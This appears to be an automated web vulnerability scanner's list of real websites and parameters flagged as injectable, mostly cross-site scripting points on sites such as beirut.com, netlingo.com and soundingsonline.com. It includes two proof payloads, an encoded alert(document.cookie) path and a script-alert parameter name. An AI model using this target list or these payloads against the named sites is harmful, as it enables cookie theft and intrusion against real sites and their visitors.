http://www.beirut.com/Shopping/Shopping-Centers/492064852/Commercial-Centers/12 [REST URL parameter 1]
http://www.beirut.com/Shopping/Shopping-Centers/492064852/Commercial-Centers/12 [REST URL parameter 1]
http://www.beirut.com/Shopping/Shopping-Centers/492064852/Commercial-Centers/12 [REST URL parameter 2]
http://www.beirut.com/Shopping/Shopping-Centers/492064852/Commercial-Centers/12 [REST URL parameter 2]
http://www.beirut.com/Shopping/Shopping-Centers/492064852/Commercial-Centers/12 [REST URL parameter 3]
http://www.beirut.com/Shopping/Shopping-Centers/492064852/Commercial-Centers/12 [REST URL parameter 4]
http://www.beirut.com/Shopping/Shopping-Centers/492064852/Shopping-Malls/10 [REST URL parameter 1]
http://www.beirut.com/Shopping/Shopping-Centers/492064852/Shopping-Malls/10 [REST URL parameter 1]
http://www.beirut.com/Shopping/Shopping-Centers/492064852/Shopping-Malls/10 [REST URL parameter 2]
http://www.beirut.com/Shopping/Shopping-Centers/492064852/Shopping-Malls/10 [REST URL parameter 2]
http://www.beirut.com/Shopping/Shopping-Centers/492064852/Shopping-Malls/10 [REST URL parameter 3]
http://www.beirut.com/Shopping/Shopping-Centers/492064852/Shopping-Malls/10 [REST URL parameter 4]
http://www.beirut.com/Shopping/Shopping-Centers/492064852/Shopping-Malls/10 [REST URL parameter 5]
http://www.beirut.com/Shopping/Specialized-Stores/2572668008 [REST URL parameter 1]
http://www.beirut.com/Shopping/Specialized-Stores/2572668008 [REST URL parameter 1]
http://www.beirut.com/Shopping/Specialized-Stores/2572668008 [REST URL parameter 2]
http://www.beirut.com/Shopping/Stores-Markets/3546182765 [REST URL parameter 1]
http://www.beirut.com/Shopping/Stores-Markets/3546182765 [REST URL parameter 1]
http://www.beirut.com/Shopping/Stores-Markets/3546182765/Department-Store/68 [REST URL parameter 1]
http://www.beirut.com/Shopping/Stores-Markets/3546182765/Department-Store/68 [REST URL parameter 1]
http://www.beirut.com/Shopping/Stores-Markets/3546182765/MiniMarket/75 [REST URL parameter 1]
http://www.beirut.com/Shopping/Stores-Markets/3546182765/MiniMarket/75 [REST URL parameter 1]
http://www.beirut.com/Shopping/Stores-Markets/3546182765/MiniMarket/75 [REST URL parameter 2]
http://www.beirut.com/Shopping/Stores-Markets/3546182765/MiniMarket/75 [REST URL parameter 2]
http://www.beirut.com/Shopping/Stores-Markets/3546182765/Supermarket/63 [REST URL parameter 1]
http://www.beirut.com/Shopping/Stores-Markets/3546182765/Supermarket/63 [REST URL parameter 1]
http://www.beirut.com/Shopping/Stores-Markets/3546182765/Supermarket/63 [REST URL parameter 2]
http://www.beirut.com/Shopping/Stores-Markets/3546182765/Supermarket/63 [REST URL parameter 2]
http://www.beirut.com/Shopping/Stores-Markets/3546182765/Supermarket/63 [REST URL parameter 3]
http://www.beirut.com/Shopping/Stores-Markets/3546182765/Supermarket/63 [REST URL parameter 4]
http://www.beirut.com/Shopping/Toys-Gifts-Electronics/849778728/Consumer-Electronics/13 [REST URL parameter 1]
http://www.beirut.com/Shopping/Toys-Gifts-Electronics/849778728/Consumer-Electronics/13 [REST URL parameter 1]
http://www.beirut.com/ThingsToDo/Ain-El-Mreisseh/Family-Fun-Day/6097 [REST URL parameter 4]
http://www.beirut.com/ThingsToDo/Ain-El-Mreisseh/Family-Fun-Day/6097 [REST URL parameter 4]
http://www.beirut.com/ThingsToDo/Clemenceau/Fluks/5938 [REST URL parameter 4]
http://www.beirut.com/ThingsToDo/Clemenceau/Fluks/5938 [REST URL parameter 4]
http://www.beirut.com/ThingsToDo/Downtown/Mounzer-Kamanakache-Venus-of-the-Clouds/5910 [REST URL parameter 4]
http://www.beirut.com/ThingsToDo/Downtown/Mounzer-Kamanakache-Venus-of-the-Clouds/5910 [REST URL parameter 4]
http://www.beirut.com/ThingsToDo/Exhibitions/6382333962 [REST URL parameter 1]
http://www.beirut.com/ThingsToDo/Exhibitions/6382333962 [REST URL parameter 1]
http://www.beirut.com/ThingsToDo/Exhibitions/6382333962 [REST URL parameter 2]
http://www.beirut.com/ThingsToDo/Exhibitions/6382333962 [REST URL parameter 2]
http://www.beirut.com/ThingsToDo/Festivals/272910464 [REST URL parameter 1]
http://www.beirut.com/ThingsToDo/Festivals/272910464 [REST URL parameter 1]
http://www.beirut.com/ThingsToDo/Festivals/272910464 [REST URL parameter 2]
http://www.beirut.com/ThingsToDo/Festivals/272910464 [REST URL parameter 2]
http://www.beirut.com/ThingsToDo/Gatherings/9274143605 [REST URL parameter 1]
http://www.beirut.com/ThingsToDo/Gatherings/9274143605 [REST URL parameter 1]
http://www.beirut.com/ThingsToDo/Gatherings/9274143605 [REST URL parameter 2]
http://www.beirut.com/ThingsToDo/Gatherings/9274143605 [REST URL parameter 2]
http://www.beirut.com/ThingsToDo/Gemmayzeh/Karaoke-Night-at-Dice/1921 [REST URL parameter 4]
http://www.beirut.com/ThingsToDo/Gemmayzeh/Karaoke-Night-at-Dice/1921 [REST URL parameter 4]
http://www.beirut.com/ThingsToDo/Hamra/Contact-Workshop-For-Beginners/6138 [REST URL parameter 4]
http://www.beirut.com/ThingsToDo/Hamra/Contact-Workshop-For-Beginners/6138 [REST URL parameter 4]
http://www.beirut.com/ThingsToDo/Hamra/One-Man-Nation-and-Kirdec-Live/6000 [REST URL parameter 4]
http://www.beirut.com/ThingsToDo/Hamra/One-Man-Nation-and-Kirdec-Live/6000 [REST URL parameter 4]
http://www.beirut.com/ThingsToDo/Hamra/Yasmina-Fayed/6158 [REST URL parameter 4]
http://www.beirut.com/ThingsToDo/Hamra/Yasmina-Fayed/6158 [REST URL parameter 4]
http://www.beirut.com/ThingsToDo/Live-Music/560568055 [REST URL parameter 1]
http://www.beirut.com/ThingsToDo/Live-Music/560568055 [REST URL parameter 1]
http://www.beirut.com/ThingsToDo/Live-Music/560568055 [REST URL parameter 2]
http://www.beirut.com/ThingsToDo/Live-Music/560568055 [REST URL parameter 2]
http://www.beirut.com/ThingsToDo/Markets-and-Deals/0106299254 [REST URL parameter 1]
http://www.beirut.com/ThingsToDo/Markets-and-Deals/0106299254 [REST URL parameter 1]
http://www.beirut.com/ThingsToDo/Markets-and-Deals/0106299254 [REST URL parameter 2]
http://www.beirut.com/ThingsToDo/Markets-and-Deals/0106299254 [REST URL parameter 2]
http://www.beirut.com/ThingsToDo/Monot/Ghada-Ghanem-Singing-with-The-Lebanese-Philharmonic-Orchestra/6044 [REST URL parameter 4]
http://www.beirut.com/ThingsToDo/Monot/Ghada-Ghanem-Singing-with-The-Lebanese-Philharmonic-Orchestra/6044 [REST URL parameter 4]
http://www.beirut.com/ThingsToDo/Monot/Un-Mage-En-Ete-Laurent-Poitrenaux/5995 [REST URL parameter 4]
http://www.beirut.com/ThingsToDo/Monot/Un-Mage-En-Ete-Laurent-Poitrenaux/5995 [REST URL parameter 4]
http://www.beirut.com/ThingsToDo/Parties/1690334 [REST URL parameter 1]
http://www.beirut.com/ThingsToDo/Parties/1690334 [REST URL parameter 1]
http://www.beirut.com/ThingsToDo/Parties/1690334 [REST URL parameter 2]
http://www.beirut.com/ThingsToDo/Parties/1690334 [REST URL parameter 2]
http://www.beirut.com/ThingsToDo/Performances/112730726 [REST URL parameter 1]
http://www.beirut.com/ThingsToDo/Performances/112730726 [REST URL parameter 1]
http://www.beirut.com/ThingsToDo/Performances/112730726 [REST URL parameter 2]
http://www.beirut.com/ThingsToDo/Performances/112730726 [REST URL parameter 2]
http://www.beirut.com/ThingsToDo/Quraitem/Letters-A-Play-Directed-by-Grace-Dunya/6081 [REST URL parameter 4]
http://www.beirut.com/ThingsToDo/Quraitem/Letters-A-Play-Directed-by-Grace-Dunya/6081 [REST URL parameter 4]
http://www.beirut.com/ThingsToDo/Screenings/60463877 [REST URL parameter 1]
http://www.beirut.com/ThingsToDo/Screenings/60463877 [REST URL parameter 1]
http://www.beirut.com/ThingsToDo/Screenings/60463877 [REST URL parameter 2]
http://www.beirut.com/ThingsToDo/Screenings/60463877 [REST URL parameter 2]
http://www.beirut.com/ThingsToDo/Seminars-and-Lectures/295390016 [REST URL parameter 1]
http://www.beirut.com/ThingsToDo/Seminars-and-Lectures/295390016 [REST URL parameter 1]
http://www.beirut.com/ThingsToDo/Seminars-and-Lectures/295390016 [REST URL parameter 2]
http://www.beirut.com/ThingsToDo/Seminars-and-Lectures/295390016 [REST URL parameter 2]
http://www.beirut.com/ThingsToDo/Theater/706796009 [REST URL parameter 1]
http://www.beirut.com/ThingsToDo/Theater/706796009 [REST URL parameter 1]
http://www.beirut.com/ThingsToDo/Theater/706796009 [REST URL parameter 2]
http://www.beirut.com/ThingsToDo/Theater/706796009 [REST URL parameter 2]
http://www.beirut.com/ThingsToDo/ThisWeek [REST URL parameter 2]
http://www.beirut.com/ThingsToDo/Today [REST URL parameter 2]
http://www.beirut.com/ThingsToDo/Workshops/7278901598 [REST URL parameter 1]
http://www.beirut.com/ThingsToDo/Workshops/7278901598 [REST URL parameter 1]
http://www.beirut.com/ThingsToDo/Workshops/7278901598 [REST URL parameter 2]
http://www.beirut.com/ThingsToDo/Workshops/7278901598 [REST URL parameter 2]
http://www.beirut.com/chat [REST URL parameter 1]
http://www.beirut.com/chat [REST URL parameter 1]
http://www.beirut.com/css/blue/4429e%2527%253balert%2528document.cookie%2529%252f%252f59f8c7185c5/css/images/closelabel.gif [REST URL parameter 5]
http://www.beirut.com/css/blue/images/search-btn.gif [REST URL parameter 3]
http://www.beirut.com/css/blue/images/search-ico.gif [REST URL parameter 3]
http://www.beirut.com/css/purple/images/search-btn.gif [REST URL parameter 3]
http://www.beirut.com/css/purple/images/search-ico.gif [REST URL parameter 3]
http://www.beirut.com/css/purple/images/site-bottom.png [REST URL parameter 3]
http://www.beirut.com/css/purple/images/site-cnt.png [REST URL parameter 3]
http://www.beirut.com/css/purple/images/site-top.png [REST URL parameter 3]
http://www.beirut.com/images/Beirut.com.png [REST URL parameter 1]
http://www.beirut.com/twitter [REST URL parameter 1]
http://www.beirut.com/twitter [REST URL parameter 1]
http://www.beneteaucountdown.com/ [name of an arbitrarily supplied request parameter]
http://www.blip.tv/posts [name of an arbitrarily supplied request parameter]
http://www.blip.tv/posts [name of an arbitrarily supplied request parameter]
http://www.blip.tv/posts/ [name of an arbitrarily supplied request parameter]
http://www.blip.tv/posts/ [name of an arbitrarily supplied request parameter]
http://www.blip.tv/users [name of an arbitrarily supplied request parameter]
http://www.blip.tv/users/ [name of an arbitrarily supplied request parameter]
http://www.boutell.com/lsm/lsmbyid.cgi/002057/x22 [REST URL parameter 3]
http://www.boutell.com/lsm/lsmbyid.cgi/002057/x22 [REST URL parameter 4]
http://www.boutell.com/lsm/lsmbyid.cgi/002057/x22 [name of an arbitrarily supplied request parameter]
http://www.espatial.com/contact/live-trial-adwords [kw parameter]
http://www.espatial.com/contact/live-trial-adwords [utm_campaign parameter]
http://www.espatial.com/contact/live-trial-adwords [utm_medium parameter]
http://www.espatial.com/contact/live-trial-adwords [utm_source parameter]
http://www.flashedition.com/flippingGen.php [lim parameter]
http://www.flashedition.com/flippingGen.php [m parameter]
http://www.flashedition.com/flippingGen.php [remToolbars parameter]
http://www.flashedition.com/flippingGen.php [roll parameter]
http://www.flashedition.com/publication [name of an arbitrarily supplied request parameter]
http://www.google.com/advanced_search [name of an arbitrarily supplied request parameter]
http://www.iloubnan.info/artsandculture/actualite/id/47982/theme/111/titre/Raquel-Boldorini-in-concert-at-AUB-s-Assembly-Hall/x22 [REST URL parameter 6]
http://www.joomlacorner.com/joomla-news/608-joomla-16-has-arrived.html [name of an arbitrarily supplied request parameter]
http://www.joomlacorner.com/joomla-news/608-joomla-16-has-arrived.html [name of an arbitrarily supplied request parameter]
http://www.linkagogo.com/go/AddNoPopup [title parameter]
http://www.linkagogo.com/go/AddNoPopup [title parameter]
http://www.linkagogo.com/go/AddNoPopup [url parameter]
http://www.lithuanianjoomla.com/7-joomla-naujienos/70-joomla-160-isleista.html [REST URL parameter 1]
http://www.lithuanianjoomla.com/7-joomla-naujienos/70-joomla-160-isleista.html [REST URL parameter 2]
http://www.lithuanianjoomla.com/apie-joomla.html [REST URL parameter 1]
http://www.lithuanianjoomla.com/component/users/ [REST URL parameter 2]
http://www.lithuanianjoomla.com/index.php [REST URL parameter 1]
http://www.lithuanianjoomla.com/index.php [name of an arbitrarily supplied request parameter]
http://www.lithuanianjoomla.com/joomla-naujienos.html [REST URL parameter 1]
http://www.lithuanianjoomla.com/joomla-naujienos.html [name of an arbitrarily supplied request parameter]
http://www.lithuanianjoomla.com/joomla-naujienos/2-laikas-isrinkti-geriausia-pasaulyje-tvs.html [REST URL parameter 1]
http://www.lithuanianjoomla.com/joomla-naujienos/2-laikas-isrinkti-geriausia-pasaulyje-tvs.html [REST URL parameter 2]
http://www.lithuanianjoomla.com/joomla-naujienos/3-lithuanianjoomlacom-logotipo-konkursas.html [REST URL parameter 1]
http://www.lithuanianjoomla.com/joomla-naujienos/3-lithuanianjoomlacom-logotipo-konkursas.html [REST URL parameter 2]
http://www.lithuanianjoomla.com/joomla-naujienos/4-lietuviskas-joomla-puslapis-lithuanianjoomlacom.html [REST URL parameter 1]
http://www.lithuanianjoomla.com/joomla-naujienos/4-lietuviskas-joomla-puslapis-lithuanianjoomlacom.html [REST URL parameter 2]
http://www.lithuanianjoomla.com/joomla-naujienos/5-pirmasis-joomla-gimtadienis.html [REST URL parameter 1]
http://www.lithuanianjoomla.com/joomla-naujienos/5-pirmasis-joomla-gimtadienis.html [REST URL parameter 2]
http://www.lithuanianjoomla.com/joomla-naujienos/6-joomla-vel-laimejo-geriausios-tvs-apdavanojimus.html [REST URL parameter 1]
http://www.lithuanianjoomla.com/joomla-naujienos/6-joomla-vel-laimejo-geriausios-tvs-apdavanojimus.html [REST URL parameter 2]
http://www.lithuanianjoomla.com/joomla-naujienos/65-joomla-1522-versija-istaiso-saugumo-spraga.html [REST URL parameter 1]
http://www.lithuanianjoomla.com/joomla-naujienos/65-joomla-1522-versija-istaiso-saugumo-spraga.html [REST URL parameter 2]
http://www.lithuanianjoomla.com/joomla-naujienos/67-joomla-16-rc1-versija.html [REST URL parameter 1]
http://www.lithuanianjoomla.com/joomla-naujienos/67-joomla-16-rc1-versija.html [REST URL parameter 2]
http://www.lithuanianjoomla.com/joomla-naujienos/68-joomla-sveikinimas-sv-kaledu-ir-naujuju-metu-proga.html [REST URL parameter 1]
http://www.lithuanianjoomla.com/joomla-naujienos/68-joomla-sveikinimas-sv-kaledu-ir-naujuju-metu-proga.html [REST URL parameter 2]
http://www.lithuanianjoomla.com/joomla-naujienos/69-lithuanianjoomlacom-atnaujinama.html [REST URL parameter 1]
http://www.lithuanianjoomla.com/joomla-naujienos/69-lithuanianjoomlacom-atnaujinama.html [REST URL parameter 2]
http://www.lithuanianjoomla.com/joomla-naujienos/70-joomla-16-isleista.html [REST URL parameter 1]
http://www.lithuanianjoomla.com/joomla-naujienos/70-joomla-16-isleista.html [REST URL parameter 2]
http://www.lithuanianjoomla.com/joomla-naujienos/71-lietuviu-kalba-joomla-16-versijai.html [REST URL parameter 1]
http://www.lithuanianjoomla.com/joomla-naujienos/71-lietuviu-kalba-joomla-16-versijai.html [REST URL parameter 2]
http://www.lithuanianjoomla.com/joomla-sasajos.html [REST URL parameter 1]
http://www.lithuanianjoomla.com/joomla-saugumas.html [REST URL parameter 1]
http://www.lithuanianjoomla.com/joomla-versijos.html [REST URL parameter 1]
http://www.lithuanianjoomla.com/kaip-idiegti-joomla.html [REST URL parameter 1]
http://www.lithuanianjoomla.com/kontaktai.html [REST URL parameter 1]
http://www.lithuanianjoomla.com/lithuanianjoomlacom-misija.html [REST URL parameter 1]
http://www.lithuanianjoomla.com/lithuanianjoomlacom-vizija.html [REST URL parameter 1]
http://www.lithuanianjoomla.com/media/system/css/system.css [REST URL parameter 4]
http://www.lithuanianjoomla.com/media/system/js/core.js [REST URL parameter 4]
http://www.lithuanianjoomla.com/media/system/js/mootools-core.js [REST URL parameter 4]
http://www.lithuanianjoomla.com/naujienos.html [REST URL parameter 1]
http://www.lithuanianjoomla.com/saugi-joomla.html [REST URL parameter 1]
http://www.lithuanianjoomla.com/saugi-joomla.html [name of an arbitrarily supplied request parameter]
http://www.lithuanianjoomla.com/saugi-joomla/75-kas-yra-saugus-patikimas-pilnas-joomla-turinio-valdymo-sistemos-paketas.html [REST URL parameter 1]
http://www.lithuanianjoomla.com/saugi-joomla/75-kas-yra-saugus-patikimas-pilnas-joomla-turinio-valdymo-sistemos-paketas.html [REST URL parameter 2]
http://www.lithuanianjoomla.com/templates/beez_20/css/general.css [REST URL parameter 4]
http://www.lithuanianjoomla.com/templates/beez_20/css/general_konqueror.css [REST URL parameter 4]
http://www.lithuanianjoomla.com/templates/beez_20/css/layout.css [REST URL parameter 4]
http://www.lithuanianjoomla.com/templates/beez_20/css/personal.css [REST URL parameter 4]
http://www.lithuanianjoomla.com/templates/beez_20/css/position.css [REST URL parameter 4]
http://www.lithuanianjoomla.com/templates/beez_20/css/print.css [REST URL parameter 4]
http://www.lithuanianjoomla.com/templates/beez_20/javascript/hide.js [REST URL parameter 4]
http://www.lithuanianjoomla.com/templates/beez_20/javascript/md_stylechanger.js [REST URL parameter 4]
http://www.lithuanianjoomla.com/templates/system/css/system.css [REST URL parameter 4]
http://www.lynda.com/landing/softwaretraining.aspx [AWKeyWord parameter]
http://www.lynda.com/landing/softwaretraining.aspx [AWKeyWord parameter]
http://www.lynda.com/landing/softwaretraining.aspx [Ptitle parameter]
http://www.masjo.com/search/learn+typing+quick+and+easy+crack/page/419/x22 [REST URL parameter 2]
http://www.masjo.com/search/learn+typing+quick+and+easy+crack/page/419/x22 [REST URL parameter 3]
http://www.masjo.com/search/learn+typing+quick+and+easy+crack/page/419/x22 [REST URL parameter 4]
http://www.masjo.com/search/learn+typing+quick+and+easy+crack/page/419/x22 [REST URL parameter 5]
http://www.mathias-bank.de/ [name of an arbitrarily supplied request parameter]
http://www.mensfitness.com/Tshirt_Workout/fitness/ab_exercises/136 [REST URL parameter 1]
http://www.mensfitness.com/Tshirt_Workout/fitness/ab_exercises/136 [REST URL parameter 1]
http://www.mensfitness.com/Tshirt_Workout/fitness/ab_exercises/136 [REST URL parameter 1]
http://www.metacafe.com/fplayer/ [name of an arbitrarily supplied request parameter]
http://www.mister-wong.com/index.php [REST URL parameter 1]
https://www.mytraderonline.com/css/promoCSS.php [REST URL parameter 1]
https://www.mytraderonline.com/css/tolhomecss.php [REST URL parameter 1]
https://www.mytraderonline.com/javascript/master_s_code.js [REST URL parameter 1]
https://www.mytraderonline.com/javascript/realmedia.js [REST URL parameter 1]
https://www.mytraderonline.com/myt/sign-in/ [REST URL parameter 1]
https://www.mytraderonline.com/myt/sign-in/ [REST URL parameter 2]
https://www.mytraderonline.com/myt/sign-in/ [name of an arbitrarily supplied request parameter]
http://www.netlingo.com/add-edit/editor-guidelines.php [name of an arbitrarily supplied request parameter]
http://www.netlingo.com/advertise/index.php [name of an arbitrarily supplied request parameter]
http://www.netlingo.com/advertise/licensing.php [name of an arbitrarily supplied request parameter]
http://www.netlingo.com/advertise/payments.php [name of an arbitrarily supplied request parameter]
http://www.netlingo.com/advertise/sponsorships.php [name of an arbitrarily supplied request parameter]
http://www.netlingo.com/by-category/index.php [name of an arbitrarily supplied request parameter]
http://www.netlingo.com/change-password.php [name of an arbitrarily supplied request parameter]
http://www.netlingo.com/contact/contact-us.php [name of an arbitrarily supplied request parameter]
http://www.netlingo.com/contact/faq.php [name of an arbitrarily supplied request parameter]
http://www.netlingo.com/contact/linktonetlingo.php [name of an arbitrarily supplied request parameter]
http://www.netlingo.com/decisions.php [name of an arbitrarily supplied request parameter]
http://www.netlingo.com/hello/welcome.php [name of an arbitrarily supplied request parameter]
http://www.netlingo.com/iphone [name of an arbitrarily supplied request parameter]
http://www.netlingo.com/iphone/ [name of an arbitrarily supplied request parameter]
http://www.netlingo.com/iphone/index.php [name of an arbitrarily supplied request parameter]
http://www.netlingo.com/legal/copyright.php [name of an arbitrarily supplied request parameter]
http://www.netlingo.com/more/adsizes.php [name of an arbitrarily supplied request parameter]
http://www.netlingo.com/press/about-netlingo.php [name of an arbitrarily supplied request parameter]
http://www.netlingo.com/press/all-press-clippings.php [name of an arbitrarily supplied request parameter]
http://www.netlingo.com/press/awards.php [name of an arbitrarily supplied request parameter]
http://www.netlingo.com/press/index.php [name of an arbitrarily supplied request parameter]
http://www.netlingo.com/press/media.php [name of an arbitrarily supplied request parameter]
http://www.netlingo.com/press/meet-erin.php [name of an arbitrarily supplied request parameter]
http://www.netlingo.com/press/print.php [name of an arbitrarily supplied request parameter]
http://www.netlingo.com/press/teen-text-talk.php [name of an arbitrarily supplied request parameter]
http://www.netlingo.com/press/web.php [name of an arbitrarily supplied request parameter]
http://www.netlingo.com/shop/netlingo-the-dictionary.php [name of an arbitrarily supplied request parameter]
http://www.netlingo.com/shop/netlingo-the-list.php [name of an arbitrarily supplied request parameter]
http://www.netlingo.com/shop/online-store.php [name of an arbitrarily supplied request parameter]
http://www.netlingo.com/tips/color-guide.php [name of an arbitrarily supplied request parameter]
http://www.netlingo.com/tips/cyber-safety-statistics.php [name of an arbitrarily supplied request parameter]
http://www.netlingo.com/tips/file-extensions.php [name of an arbitrarily supplied request parameter]
http://www.netlingo.com/tips/index.php [name of an arbitrarily supplied request parameter]
http://www.netlingo.com/tips/resources.php [name of an arbitrarily supplied request parameter]
http://www.netlingo.com/tips/webcasts.php [name of an arbitrarily supplied request parameter]
http://www.netlingo.com/tools/index.php [name of an arbitrarily supplied request parameter]
http://www.netlingo.com/tools/online-store.php [name of an arbitrarily supplied request parameter]
http://www.netlingo.com/tools/pocket-dictionary.php [name of an arbitrarily supplied request parameter]
http://www.netlingo.com/tools/search-browse-box.php [name of an arbitrarily supplied request parameter]
http://www.netlingo.com/tools/toolbar.php [name of an arbitrarily supplied request parameter]
http://www.netlingo.com/tools/widget.php [name of an arbitrarily supplied request parameter]
http://www.netlingo.com/tools/wotd.php [name of an arbitrarily supplied request parameter]
http://www.netlingo.com/top50/index.php [name of an arbitrarily supplied request parameter]
http://www.netlingo.com/word-of-the-day/aotd.php [name of an arbitrarily supplied request parameter]
http://www.netlingo.com/word-of-the-day/business.php [name of an arbitrarily supplied request parameter]
http://www.netlingo.com/word-of-the-day/feeds.php [name of an arbitrarily supplied request parameter]
http://www.netlingo.com/word-of-the-day/jargon.php [name of an arbitrarily supplied request parameter]
http://www.netlingo.com/word-of-the-day/technical.php [name of an arbitrarily supplied request parameter]
http://www.netlingo.com/word/53x.php [name of an arbitrarily supplied request parameter]
http://www.netlingo.com/word/aor.php [name of an arbitrarily supplied request parameter]
http://www.netlingo.com/word/buff.php [name of an arbitrarily supplied request parameter]
http://www.netlingo.com/word/cu46.php [name of an arbitrarily supplied request parameter]
http://www.netlingo.com/word/dead-cell-phones.php [name of an arbitrarily supplied request parameter]
http://www.netlingo.com/word/dead-computers.php [name of an arbitrarily supplied request parameter]
http://www.netlingo.com/word/digitally-grounded.php [name of an arbitrarily supplied request parameter]
http://www.netlingo.com/word/do-not-track.php [name of an arbitrarily supplied request parameter]
http://www.netlingo.com/word/elancers.php [name of an arbitrarily supplied request parameter]
http://www.netlingo.com/word/fingerprint.php [name of an arbitrarily supplied request parameter]
http://www.netlingo.com/word/gadget.php [name of an arbitrarily supplied request parameter]
http://www.netlingo.com/word/gizmo.php [name of an arbitrarily supplied request parameter]
http://www.netlingo.com/word/lm4azzzz.php [name of an arbitrarily supplied request parameter]
http://www.netlingo.com/word/mih.php [name of an arbitrarily supplied request parameter]
http://www.netlingo.com/word/next-generation.php [name of an arbitrarily supplied request parameter]
http://www.netlingo.com/word/online-jargon.php [name of an arbitrarily supplied request parameter]
http://www.netlingo.com/word/ru18-2.php [name of an arbitrarily supplied request parameter]
http://www.netlingo.com/word/wtg4a.php [name of an arbitrarily supplied request parameter]
http://www.networkworld.com/community/blog/ebay-use-joomla-open-source-glue [REST URL parameter 1]
http://www.networkworld.com/community/blog/ebay-use-joomla-open-source-glue [REST URL parameter 2]
http://www.networkworld.com/community/blog/ebay-use-joomla-open-source-glue [REST URL parameter 3]
http://www.networkworld.com/community/blog/ebay-use-joomla-open-source-glue [name of an arbitrarily supplied request parameter]
http://www.networkworld.com/community/blog/ebay-use-joomla-open-source-glue [name of an arbitrarily supplied request parameter]
http://www.networkworld.com/news/2010/100710-ebay-deploys-joomla-for-analytics.html [REST URL parameter 1]
http://www.networkworld.com/news/2010/100710-ebay-deploys-joomla-for-analytics.html [REST URL parameter 2]
http://www.networkworld.com/news/2010/100710-ebay-deploys-joomla-for-analytics.html [REST URL parameter 3]
http://www.networkworld.com/news/2010/100710-ebay-deploys-joomla-for-analytics.html [name of an arbitrarily supplied request parameter]
http://www.newsreaders.com/unix/utilities.html/x22 [REST URL parameter 1]
http://www.newsreaders.com/unix/utilities.html/x22 [REST URL parameter 1]
http://www.newsreaders.com/unix/utilities.html/x22 [REST URL parameter 2]
http://www.newsreaders.com/unix/utilities.html/x22 [REST URL parameter 2]
http://www.newsreaders.com/unix/utilities.html/x22 [REST URL parameter 3]
http://www.newsreaders.com/unix/utilities.html/x22 [REST URL parameter 3]
http://www.opengroup.org/onlinepubs/009629399 [REST URL parameter 1]
http://www.opengroup.org/onlinepubs/009629399 [REST URL parameter 1]
http://www.opengroup.org/onlinepubs/009629399 [REST URL parameter 2]
http://www.opengroup.org/onlinepubs/009629399 [REST URL parameter 2]
http://www.opengroup.org/onlinepubs/009629399/apdxa.htm [REST URL parameter 1]
http://www.opengroup.org/onlinepubs/009629399/apdxa.htm [REST URL parameter 1]
http://www.opengroup.org/onlinepubs/009629399/apdxa.htm [REST URL parameter 2]
http://www.opengroup.org/onlinepubs/009629399/apdxa.htm [REST URL parameter 2]
http://www.opengroup.org/onlinepubs/009629399/apdxa.htm [REST URL parameter 3]
http://www.opengroup.org/onlinepubs/009629399/apdxa.htm [REST URL parameter 3]
http://www.paperg.com/jsfb/embed.php [bid parameter]
http://www.paperg.com/jsfb/embed.php [bid parameter]
http://www.paperg.com/jsfb/embed.php [name of an arbitrarily supplied request parameter]
http://www.paperg.com/jsfb/embed.php [pid parameter]
http://www.parenthood.com/ [name of an arbitrarily supplied request parameter]
http://www.sailinganarchy.com/article_submission.php [name of an arbitrarily supplied request parameter]
http://www.shape.com/workouts/articles/blood_sugar.html [REST URL parameter 1]
http://www.shape.com/workouts/articles/blood_sugar.html [REST URL parameter 2]
http://www.shape.com/workouts/articles/blood_sugar.html [REST URL parameter 3]
http://www.shape.com/workouts/articles/workout_schedule.html [REST URL parameter 1]
http://www.shape.com/workouts/articles/workout_schedule.html [REST URL parameter 2]
http://www.shape.com/workouts/articles/workout_schedule.html [REST URL parameter 3]
http://www.soundingsonline.com/about-us [name of an arbitrarily supplied request parameter]
http://www.soundingsonline.com/advertise [name of an arbitrarily supplied request parameter]
http://www.soundingsonline.com/archives ['"--></style></script><script>alert(0x001E2B)</script> parameter]
http://www.soundingsonline.com/archives [name of an arbitrarily supplied request parameter]
http://www.soundingsonline.com/boat-shop [name of an arbitrarily supplied request parameter]
http://www.soundingsonline.com/boat-shop/know-how [name of an arbitrarily supplied request parameter]
http://www.soundingsonline.com/boat-shop/new-boats [name of an arbitrarily supplied request parameter]
http://www.soundingsonline.com/boat-shop/new-gear [name of an arbitrarily supplied request parameter]
http://www.soundingsonline.com/boat-shop/on-powerboats [name of an arbitrarily supplied request parameter]
http://www.soundingsonline.com/boat-shop/on-sailboats [name of an arbitrarily supplied request parameter]
http://www.soundingsonline.com/boat-shop/q-a-a [name of an arbitrarily supplied request parameter]
http://www.soundingsonline.com/boat-shop/sea-savvy [name of an arbitrarily supplied request parameter]
http://www.soundingsonline.com/boat-shop/tech-talk [name of an arbitrarily supplied request parameter]
http://www.soundingsonline.com/boat-shop/used-boat-review [name of an arbitrarily supplied request parameter]
http://www.soundingsonline.com/calendar [name of an arbitrarily supplied request parameter]
http://www.soundingsonline.com/career-opportunities [name of an arbitrarily supplied request parameter]
http://www.soundingsonline.com/columns-blogs [name of an arbitrarily supplied request parameter]
http://www.soundingsonline.com/columns-blogs/bay-tripper [name of an arbitrarily supplied request parameter]
http://www.soundingsonline.com/columns-blogs/books [name of an arbitrarily supplied request parameter]
http://www.soundingsonline.com/columns-blogs/new-england-fishing [name of an arbitrarily supplied request parameter]
http://www.soundingsonline.com/columns-blogs/under-way [name of an arbitrarily supplied request parameter]
http://www.soundingsonline.com/contact-us [name of an arbitrarily supplied request parameter]
http://www.soundingsonline.com/features [name of an arbitrarily supplied request parameter]
http://www.soundingsonline.com/features/in-depth [name of an arbitrarily supplied request parameter]
http://www.soundingsonline.com/features/justyesterday [name of an arbitrarily supplied request parameter]
http://www.soundingsonline.com/features/lifestyle [name of an arbitrarily supplied request parameter]
http://www.soundingsonline.com/features/profiles [name of an arbitrarily supplied request parameter]
http://www.soundingsonline.com/features/technical [name of an arbitrarily supplied request parameter]
http://www.soundingsonline.com/features/type-of-boat [name of an arbitrarily supplied request parameter]
http://www.soundingsonline.com/index.php [name of an arbitrarily supplied request parameter]
http://www.soundingsonline.com/modules/mod_gk_news_image_1/css/style.php [image_x parameter]
http://www.soundingsonline.com/modules/mod_gk_news_image_1/css/style.php [image_y parameter]
http://www.soundingsonline.com/modules/mod_gk_news_image_1/css/style.php [module_height parameter]
http://www.soundingsonline.com/modules/mod_gk_news_image_1/css/style.php [module_width parameter]
http://www.soundingsonline.com/modules/mod_gk_news_image_1/css/style.php [text_block_bgcolor parameter]
http://www.soundingsonline.com/modules/mod_gk_news_image_1/css/style.php [text_block_margin parameter]
http://www.soundingsonline.com/modules/mod_gk_news_image_1/css/style.php [text_block_opacity parameter]
